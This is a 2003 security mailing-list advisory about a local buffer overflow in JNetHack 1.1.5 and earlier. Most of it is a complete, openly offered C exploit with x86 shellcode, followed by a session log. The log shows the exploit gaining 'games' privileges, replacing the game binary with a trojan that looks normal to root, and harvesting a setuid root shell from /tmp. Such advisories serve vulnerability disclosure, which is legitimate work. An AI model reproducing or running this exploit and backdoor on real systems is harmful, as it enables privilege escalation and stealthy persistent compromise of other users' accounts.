[EXPL] JNetHack Exploit Code Released

From: SecuriTeam (support_at_securiteam.com)
Date: 06/23/03

  • Next message: SecuriTeam: "[NT] Multiple Buffer Overflow Vulnerabilities Found in MERCUR Mail Server" 
    To: list@securiteam.com
Date: 23 Jun 2003 12:05:40 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security in Canada

    Toronto-based Sunrays Technologies is now Beyond Security's representative in Canada.
    We welcome ISPs, system integrators and IT systems resellers
    to promote the most advanced vulnerability assessment solutions today.

    Contact us at 416-482-0038 or at canadasales@beyondsecurity.com

    - - - - - - - - -

      JNetHack Exploit Code Released
    ------------------------------------------------------------------------

    SUMMARY

    The " <http://www.jnethack.org/> JNetHack" is a Japanese NetHack. A
    locally exploitable buffer overflow allows local attackers to gain 'games'
    privileges.

    DETAILS

    Vulnerable systems:
     *JNetHack version 1.1.5 and prior

    Exploit:
    /*********************************************************************************\
       jnethack <= 1.1.5 exploit written by r-code d_fence@gmx.net [Elite FXP
    Team]
                                                                               
          
               jnethack has the sgid bit set on and is owned by group 'games'.

          Firstly we gain the GID of 'games' and then (due to incorrect
    permissions)
     We change the binary so that we can gain the uid/gid of anyone (hope
    that`s r00t) who`ll run
                      jnethack (tha shell lies at /tmp/.jnet/USERNAME)
               

          
          
    EXAMPLE (Tested on Debian Woody 3.0):

    r-code@coredump:/tmp$ tar -xzvf jnethack0x02.tar.gz
    hackjnet0x02.c
    sh
    r-code@coredump:/tmp$ cc hackjnet0x02.c -o hackjnet0x02
    r-code@coredump:/tmp$ ./hackjnet0x02
    * jnethack <= 1.1.15 exploit by r-code d_fence@gmx.net [Elite FXP Team]
    * Greetz to: czarny,|stachu|, Nitro, Zami, Razor, Jedlik, Cypher
    * Flames to: ElSiLaSoF

    + ESP: 0xbffff914
    + OFFSET 0x21ca, RET_ADDR: 0xbfffd752
    + If doesn't work try: "./hackjnet0x02 8500-8700" in 20 steps

    Cannot find any current entries for 1ÛØ°Í1ÛØ°.Í1ÀPh//shh/tmpãPSá1Ò°
                                                               Í1ÛØ°Í¿R×ÿ¿R×ÿ¿
    R×ÿ¿R×ÿ¿R×ÿ¿R×ÿ¿R×ÿ¿R×ÿ¿R×ÿ¿R×ÿ¿R×ÿ¿R×ÿ¿R×ÿ¿R×ÿ¿R×
    ÿ¿R×ÿ¿R×ÿ¿R×ÿ¿R×ÿ¿R×ÿ¿R×ÿ¿R×ÿ¿R×ÿ¿
    Call is: jnethack -s [-v] [-role] [maxrank] [playernames]
    mkdir: cannot create directory `/tmp/.jnet': File exists
    :: Compilling files..
    :: Changing the binary..
    :: Cleaning a bit..

    iNFO) Done!
    iNFO) Now every user who runs /usr/lib/games/jnethack/jnethack will leave
    a shell
    with is euid in /tmp/.jnet/
    iNFO) Elite FXP Team - the ultimative 31337 Crew ;]
    r-code@coredump:/tmp$ su -
    Password:
    bash-2.05a# jnethack
    [Here comes the normal jnethack so that root can`t see that it`s a
    different binary]
    bash-2.05a# su r-code
    r-code@coredump:/tmp$ cd /tmp/.jnet/
    r-code@coredump:/tmp/.jnet$ ls -al
    razem 1460
    drwxrwxrwx 2 r-code games 4096 cze 19 21:37 .
    drwxrwxrwt 129 root root 12288 cze 19 21:36 ..
    -rw-rw---- 1 r-code games 436 cze 19 21:36 change.c
    -rwxr-sr-x 1 r-code games 1448696 cze 19 21:36 jnethack-orig
    -rwsr-xr-x 1 root root 5347 cze 19 21:37 root
    -r-xr-xr-x 1 r-code games 5347 cze 19 21:36 run
    -rw-rw---- 1 r-code games 298 cze 19 21:36 run.c
    r-code@coredump:/tmp/.jnet$ ./root
    sh-2.05a# id
    uid=0(root) gid=0(root) grupy=1009(r-code)
    sh-2.05a# exit
    exit

     Greetz to: czarny,|stachu|, Nitro, Zami, Razor, Jedlik, Cypher
     Flames to: ElSiLaSoF - *** ya bitch!!!
                                                                               
          
    \*********************************************************************************/

    #include <stdio.h>
    #include <unistd.h>
    #include <stdlib.h>

    unsigned long int get_sp(void) {
      __asm__("movl %esp,%eax");
    }

    char shellcode[] =
    "\x31\xdb\x89\xd8\xb0\x17\xcd\x80"
    "\x31\xdb\x89\xd8\xb0\x2e\xcd\x80"
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68"
    "\x68\x2f\x74\x6d\x70\x89\xe3\x50"
    "\x53\x89\xe1\x31\xd2\xb0\x0b\xcd"
    "\x80\x31\xdb\x89\xd8\xb0\x01\xcd\x80"
    ;

    #define LEN 300
    #define DEFAULT_OFFSET 8650
    #define PATH "/usr/lib/games/jnethack/jnethack"

    int main(int argc,char **argv) {
      register int i;
      char *evilstr=0,*str=0;
      unsigned long int retaddr=0,offset=DEFAULT_OFFSET,*ptr=0;

      
      printf("* jnethack <= 1.1.15 exploit by r-code d_fence@gmx.net [Elite
    FXP Team]\n");
      printf("* Greetz to: czarny,|stachu|, Nitro, Zami, Razor, Jedlik,
    Cypher\n");
      printf("* Flames to: ElSiLaSoF\n\n");
      
      if(argc>1)
        offset=atoi(argv[1]);
      
      retaddr=get_sp() - offset;
      
      printf("+ ESP: 0x%x\n",get_sp());
      printf("+ OFFSET 0x%x, RET_ADDR: 0x%x\n",offset,retaddr);
      printf("+ If doesn't work try: \"%s 8500-8700\" in 20 steps\n",argv[0]);
          
      evilstr=(char *)malloc(LEN);
      ptr=(unsigned long int *)evilstr;

      for(i=0;i<(LEN);) {
                       evilstr[i++] = (retaddr & 0x000000ff);
                       evilstr[i++] = (retaddr & 0x0000ff00) >> 8;
                       evilstr[i++] = (retaddr & 0x00ff0000) >> 16;
                       evilstr[i++] = (retaddr & 0xff000000) >> 24;
               }
      
      memset(evilstr,0x90,(LEN/2));
      for(i=0;i<strlen(shellcode);i++)
        evilstr[(LEN/2)-(strlen(shellcode)/2)+i]=shellcode[i];

      evilstr[LEN]=0x00;
      execl(PATH,"jnethack","-s",evilstr,NULL);
    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:r-code@smart.toya.net.pl>
    r-code.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[NT] Multiple Buffer Overflow Vulnerabilities Found in MERCUR Mail Server"

    Relevant Pages